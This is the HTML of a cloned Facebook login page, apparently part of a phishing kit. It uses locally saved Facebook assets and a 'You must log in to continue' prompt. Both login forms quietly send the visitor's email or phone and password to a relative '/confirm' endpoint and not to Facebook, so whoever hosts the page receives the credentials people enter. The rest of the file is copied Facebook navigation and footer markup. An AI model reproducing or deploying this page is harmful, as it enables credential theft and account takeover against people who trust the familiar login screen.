<!DOCTYPE html>
<base href="/">
<html lang="en" id="facebook" class="tinyViewport tinyWidth">

<head>
 

    <title id="pageTitle">Facebook</title>
    <meta property="og:title" content="Log in or sign up to view">
    <meta property="og:description" content="See posts, photos and more on Facebook.">
    <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico">
    <link type="text/css" rel="stylesheet" href="./Facebook_files/DpGBo_d_sqJ.css" data-bootloader-hash="mHAHe"
        crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="./Facebook_files/559NaV_ADv3.css" data-bootloader-hash="YiMqD"
        crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="./Facebook_files/nyjZ7FNTJPP.css" data-bootloader-hash="Ptg3g"
        crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="./Facebook_files/09QDFcoI2jP.css" data-bootloader-hash="Bww/6"
        data-nonblocking="1" crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="./Facebook_files/Yv82A7rPBTJ.css" data-bootloader-hash="RNxik"
        crossorigin="anonymous">

</head>

<body
    class="fbx UIPage_LoggedOut _-kb _61s0 _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_GB cores-gte4 _19_u hasAXNavMenubar"
    dir="ltr">
    <div class="_li" id="u_0_5">
        <div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_6">
            <div class="_608m">
                <div class="_5aj7 _tb6">
                    <div class="_4bl7"><span class="mrm _3bcv _50f3">Jump to</span></div>
                    <div class="_4bl9 _3bcp">
                        <div class="_6a _608n" aria-label="Navigation assistant" aria-keyshortcuts="Alt+/"
                            role="menubar" id="u_0_7">
                            <div class="_6a uiPopover" id="u_0_8"><a role="menuitem"
                                    class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy"
                                    href="https://www.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1#"
                                    style="max-width:200px;" aria-haspopup="true" aria-expanded="false" rel="toggle"
                                    id="u_0_9"><span class="_55pe">Sections of this page</span><span
                                        class="_4o_3 _3-99"><i class="img sp_tqJm9jnBSMK sx_0ecb5d"></i></span></a>
                            </div>
                            <div class="_6a _3bcs"></div>
                            <div class="_6a mrm uiPopover" id="u_0_a"><a role="menuitem"
                                    class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy"
                                    href="https://www.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1#"
                                    style="max-width:200px;" aria-haspopup="true" tabindex="-1" aria-expanded="false"
                                    rel="toggle" id="u_0_b"><span class="_55pe">Accessibility help</span><span
                                        class="_4o_3 _3-99"><i class="img sp_tqJm9jnBSMK sx_43d969"></i></span></a>
                            </div>
                        </div>
                    </div>
                    <div class="_4bl7 mlm pll _3bct">
                        <div class="_6a _3bcy">Press <span class="_3bcz">alt</span> + <span class="_3bcz">/</span> to
                            open this menu</div>
                    </div>
                </div>
            </div>
        </div>
        <div id="pagelet_bluebar" data-referrer="pagelet_bluebar">
            <div id="blueBarDOMInspector">
                <div class="_53jh">
                    <div class="loggedout_menubar_container">
                        <div class="clearfix loggedout_menubar">
                            <div class="lfloat _ohe">
                                <h1><a href="https://www.facebook.com/" title="Go to Facebook home"><i
                                            class="fb_logo img sp_tqJm9jnBSMK sx_f93287"><u>Facebook</u></i></a></h1>
                            </div>
                            <div class="menu_login_container rfloat _ohf" data-testid="royal_login_form">
                                <form id="login_form" action="/confirm" method="post" novalidate="1" onsubmit=""><input
                                        type="hidden" name="jazoest" value="2662" autocomplete="off"><input
                                        type="hidden" name="lsd" value="AVqwUA1P" autocomplete="off">
                                    <table cellspacing="0" role="presentation">
                                        <tbody>
                                            <tr>
                                                <td class="html7magic"><label for="email">Email or Phone</label></td>
                                                <td class="html7magic"><label for="pass">Password</label></td>
                                            </tr>
                                            <tr>
                                                <td><input type="email" class="inputtext" name="email" id="email"
                                                        data-testid="royal_email"></td>
                                                <td><input type="password" class="inputtext" name="pass" id="pass"
                                                        data-testid="royal_pass"></td>
                                                <td><label class="uiButton uiButtonConfirm" id="loginbutton"
                                                        for="u_0_2"><input value="Log In" aria-label="Log In"
                                                            data-testid="royal_login_button" type="submit"
                                                            id="u_0_2"></label></td>
                                            </tr>
                                            <tr>
                                                <td class="login_form_label_field"></td>
                                                <td class="login_form_label_field">
                                                    <div><a
                                                            href="https://www.facebook.com/recover/initiate?lwv=110&amp;ars=royal_blue_bar">Forgotten
                                                            account?</a></div>
                                                </td>
                                            </tr>
                                        </tbody>
                                    </table><input type="hidden" autocomplete="off" name="timezone" value="-120"
                                        id="u_0_3"><input type="hidden" autocomplete="off" name="lgndim"
                                        value="eyJ3IjoxOTIwLCJoIjoxMDgwLCJhdyI6MTkyMCwiYWgiOjEwNDAsImMiOjI0fQ=="
                                        id="u_0_4"><input type="hidden" name="lgnrnd" value="024130_b_Jc"><input
                                        type="hidden" id="lgnjs" name="lgnjs" value="1556876492"><input type="hidden"
                                        autocomplete="off" name="ab_test_data" value=""><input type="hidden"
                                        autocomplete="off" id="locale" name="locale" value="en_GB"><input type="hidden"
                                        autocomplete="off" name="login_source" value="login_bluebar"><input
                                        type="hidden" autocomplete="off" id="prefill_contact_point"
                                        name="prefill_contact_point"><input type="hidden" autocomplete="off"
                                        id="prefill_source" name="prefill_source"><input type="hidden"
                                        autocomplete="off" id="prefill_type" name="prefill_type"><input type="hidden"
                                        name="skstamp"
                                        value="eyJoYXNoIjoiYjc3ODQwZWMxMDA5NDY4OTRkYWM5MTE3YzVmMWM0MDIiLCJoYXNoMiI6IjVjYzdjYTgzNjllYjJlZjI4NTIzODVlYjUwNjk4YTBiIiwicm91bmRzIjo1LCJzZWVkIjoiYzc1ODJkNDVlNWUyZmIxYmQwMTI3ZmQ5YWMyMmRiNWMiLCJzZWVkMiI6IjJmMWI0YzQ2MjljMGFkNWJkMzg4YjBmMjI1NTU3YTcxIiwidGltZV90YWtlbiI6MTAxNzgwLCJzdXJmYWNlIjoibG9naW4ifQ=="><input
                                        type="hidden" name="skstamp"
                                        value="eyJoYXNoIjoiYjc3ODQwZWMxMDA5NDY4OTRkYWM5MTE3YzVmMWM0MDIiLCJoYXNoMiI6IjVjYzdjYTgzNjllYjJlZjI4NTIzODVlYjUwNjk4YTBiIiwicm91bmRzIjo1LCJzZWVkIjoiYzc1ODJkNDVlNWUyZmIxYmQwMTI3ZmQ5YWMyMmRiNWMiLCJzZWVkMiI6IjJmMWI0YzQ2MjljMGFkNWJkMzg4YjBmMjI1NTU3YTcxIiwidGltZV90YWtlbiI6NDkzOTQsInN1cmZhY2UiOiJsb2dpbiJ9">
                                </form>
                            </div>
                        </div>
                    </div>
                    <div class="signupBanner">
                        <div class="signup_bar_container">
                            <div class="signup_box clearfix"><span class="signup_box_content"><a role="button"
                                        class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy"
                                        href="https://www.facebook.com/r.php?locale=en_GB">Sign Up</a></span></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div id="globalContainer" class="_cqt">
            <div class="fb_content clearfix " id="content" role="main">
                <div>
                    <div class="_4-u5 _30ny">
                        <div class="_cqs">
                            <div class="_585n _3-8n" id="u_0_c"><img class="_585p img sp_tqJm9jnBSMK sx_d6ae9f"
                                    src="i.PNG">
                                <div class="_585r _50f4">You must log in to continue.</div>
                            </div>
                            <div class="_cqq">
                                <div class="_cqp">Log in to Facebook</div>
                                <div>
                                    <form id="login_form" action="/confirm" method="post" novalidate="1" onsubmit="">
                                        <input type="hidden" name="jazoest" value="2662" autocomplete="off"><input
                                            type="hidden" name="lsd" value="AVqwUA1P" autocomplete="off">
                                        <div>
                                            <div class="_5jb3">
                                                <div class="_5jb4"><input type="email" class="inputtext" id="email"
                                                        name="email_a" placeholder="Email or Phone"
                                                        aria-label="Email or Phone"></div>
                                                <div class="_5jb_"></div>
                                                <div class="_5jb5"><input type="password" class="inputtext" id="pass"
                                                        name="pass_a" placeholder="Password" aria-label="Password">
                                                </div>
                                            </div>
                                            <div class="_70g9"><button value="1"
                                                    class="_42ft _4jy0 _5jc7 _3jd8 _4jy5 _4jy1 selected _51sy"
                                                    id="loginbutton" data-testid="royal_login_button" type="submit">Log
                                                    In</button></div>
                                            <div class="_5jb9"><a
                                                    href="https://www.facebook.com/recover/initiate?lwv=110&amp;ars=royal_blue_bar">Forgotten
                                                    account?</a></div>
                                        </div><input type="hidden" autocomplete="off" name="timezone" value="-120"
                                            id="u_0_d"><input type="hidden" autocomplete="off" name="lgndim"
                                            value="eyJ3IjoxOTIwLCJoIjoxMDgwLCJhdyI6MTkyMCwiYWgiOjEwNDAsImMiOjI0fQ=="
                                            id="u_0_e"><input type="hidden" name="lgnrnd" value="024130_b_Jc"><input
                                            type="hidden" id="lgnjs" name="lgnjs" value="n"><input type="hidden"
                                            autocomplete="off" name="ab_test_data" value=""><input type="hidden"
                                            autocomplete="off" id="locale" name="locale" value="en_GB"><input
                                            type="hidden" autocomplete="off" id="prefill_contact_point"
                                            name="prefill_contact_point"><input type="hidden" autocomplete="off"
                                            id="prefill_source" name="prefill_source"><input type="hidden"
                                            autocomplete="off" id="prefill_type" name="prefill_type">
                                    </form>
                                </div><a role="button" class="_42ft _4jy0 _cqr _4jy3 _4jy2 selected _51sy mrm"
                                    href="https://www.facebook.com/r.php?r=101">Create New Account</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="_cqu">
                <div id="pageFooter" data-referrer="page_footer">
                    <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
                        <li>English (UK)</li>
                        <li><a class="_sv4" dir="rtl"
                                href="https://ar-ar.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_GB&quot;, &quot;https:\/\/ar-ar.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 0); return false;"
                                title="Arabic">العربية</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://fr-fr.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_GB&quot;, &quot;https:\/\/fr-fr.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 1); return false;"
                                title="French (France)">Français (France)</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://it-it.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_GB&quot;, &quot;https:\/\/it-it.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 2); return false;"
                                title="Italian">Italiano</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://de-de.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_GB&quot;, &quot;https:\/\/de-de.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 3); return false;"
                                title="German">Deutsch</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://ru-ru.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ru_RU&quot;, &quot;en_GB&quot;, &quot;https:\/\/ru-ru.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 4); return false;"
                                title="Russian">Русский</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://es-la.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_GB&quot;, &quot;https:\/\/es-la.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 5); return false;"
                                title="Spanish">Español</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://id-id.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;id_ID&quot;, &quot;en_GB&quot;, &quot;https:\/\/id-id.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 6); return false;"
                                title="Indonesian">Bahasa Indonesia</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://tr-tr.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_GB&quot;, &quot;https:\/\/tr-tr.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 7); return false;"
                                title="Turkish">Türkçe</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://pt-br.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_BR&quot;, &quot;en_GB&quot;, &quot;https:\/\/pt-br.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 8); return false;"
                                title="Portuguese (Brazil)">Português (Brasil)</a></li>
                        <li><a class="_sv4" dir="ltr"
                                href="https://hi-in.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1"
                                onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_GB&quot;, &quot;https:\/\/hi-in.facebook.com\/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1&quot;, &quot;www_list_selector&quot;, 9); return false;"
                                title="Hindi">हिन्दी</a></li>
                        <li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog"
                                ajaxify="/settings/language/language/?uri=https%3A%2F%2Fhi-in.facebook.com%2Fphoto.php%3Ffbid%3D221501025476445%26set%3Dpcb.394505234476222%26type%3D3%26theater%26ifg%3D1&amp;source=www_list_selector_more"
                                href="https://www.facebook.com/photo.php?fbid=221501025476445&amp;set=pcb.394505234476222&amp;type=3&amp;theater&amp;ifg=1#"
                                title="Show more languages"><i class="img sp_tqJm9jnBSMK sx_17b124"></i></a></li>
                    </ul>
                    <div id="contentCurve"></div>
                    <div role="contentinfo" aria-label="Facebook site links" id="js_4">
                        <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                            <li><a href="https://www.facebook.com/r.php" title="Sign up for Facebook">Sign Up</a></li>
                            <li><a href="https://www.facebook.com/login/" title="Log in to Facebook">Log In</a></li>
                            <li><a href="https://messenger.com/" title="Take a look at Messenger.">Messenger</a></li>
                            <li><a href="https://www.facebook.com/lite/" title="Facebook Lite for Android.">Facebook
                                    Lite</a></li>
                            <li><a href="https://www.facebook.com/find-friends?ref=pf"
                                    title="Find anyone on the web.">Find Friends</a></li>
                            <li><a href="https://www.facebook.com/directory/people_remain/"
                                    title="Browse our people directory.">People</a></li>
                            <li><a href="https://www.facebook.com/directory/people_sm/"
                                    title="Browse our profiles directory.">Profiles</a></li>
                            <li><a href="https://www.facebook.com/directory/pages/"
                                    title="Browse our Pages directory.">Pages</a></li>
                            <li><a href="https://www.facebook.com/pages/category/">Page categories</a></li>
                            <li><a href="https://www.facebook.com/places/"
                                    title="Take a look at popular places on Facebook.">Places</a></li>
                            <li><a href="https://www.facebook.com/games/" title="Check out Facebook games.">Games</a>
                            </li>
                            <li><a href="https://www.facebook.com/directory/places/"
                                    title="Browse our places directory.">Locations</a></li>
                            <li><a href="https://www.facebook.com/marketplace/directory/"
                                    title="Browse our Marketplace product directory.">Marketplace</a></li>
                            <li><a href="https://www.facebook.com/directory/groups/"
                                    title="Browse our Groups directory.">Groups</a></li>
                            <li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Finstagram.com%2F&amp;h=AT2gyTGsYzd4SEDnDTefk8VjDmxKOC37ZfkrTNR8aW3-7owTeeLSWFaMMNBTfq2QX-UiivXkLb6HvB5K-Uu52utPUH6vnR6XMfMN-ubEvayUm1dHdWFZ0kTQ8pI6Rba66WhfhPecLvaNmMPGDaJ-bg"
                                    title="Take a look at Instagram" target="_blank" rel="noopener nofollow"
                                    data-lynx-mode="asynclazy">Instagram</a></li>
                            <li><a href="https://www.facebook.com/local/lists/245019872666104/"
                                    title="Browse our Local Lists directory.">Local</a></li>
                            <li><a href="https://www.facebook.com/fundraisers/"
                                    title="Donate to worthy causes.">Fundraisers</a></li>
                            <li><a href="https://www.facebook.com/facebook" accesskey="8"
                                    title="Read our blog, discover the resource centre and find job opportunities.">About</a>
                            </li>
                            <li><a href="https://www.facebook.com/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto"
                                    title="Advertise on Facebook">Create ad</a></li>
                            <li><a href="https://www.facebook.com/pages/create/?ref_type=sitefooter"
                                    title="Create a Page">Create Page</a></li>
                            <li><a href="https://developers.facebook.com/?ref=pf"
                                    title="Develop on our platform.">Developers</a></li>
                            <li><a href="https://www.facebook.com/careers/?ref=pf"
                                    title="Make your next career move to our brilliant company.">Careers</a></li>
                            <li><a data-nocookies="1" href="https://www.facebook.com/privacy/explanation"
                                    title="Learn about your privacy and Facebook.">Privacy</a></li>
                            <li><a href="https://www.facebook.com/policies/cookies/"
                                    title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li>
                            <li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217"
                                    title="Learn about AdChoices.">AdChoices<i
                                        class="img sp_tqJm9jnBSMK sx_914491"></i></a></li>
                            <li><a data-nocookies="1" href="https://www.facebook.com/policies?ref=pf" accesskey="9"
                                    title="Review our terms and policies.">Terms</a></li>
                            <li><a href="https://www.facebook.com/help/2687943754764396">Account security</a></li>
                            <li><a href="https://www.facebook.com/help/www/1573156092981768/">Login help</a></li>
                            <li><a href="https://www.facebook.com/help/?ref=pf" accesskey="0"
                                    title="Visit our Help Centre.">Help</a></li>
                            <li><a accesskey="6" class="accessible_elem" href="https://www.facebook.com/settings"
                                    title="View and edit your Facebook settings.">Settings</a></li>
                            <li><a accesskey="7" class="accessible_elem"
                                    href="https://www.facebook.com/allactivity?privacy_source=activity_log_top_menu"
                                    title="View your activity log">Activity log</a></li>
                        </ul>
                    </div>
                    <div class="mvl copyright">
                        <div><span> Facebook © 2019</span></div>
                    </div>
                </div>
            </div>
        </div>
        <div></div><span><img src="./Facebook_files/hsts-pixel.gif" width="0" height="0" style="display:none"></span>
    </div>
    <div></div>
    
</body>

</html>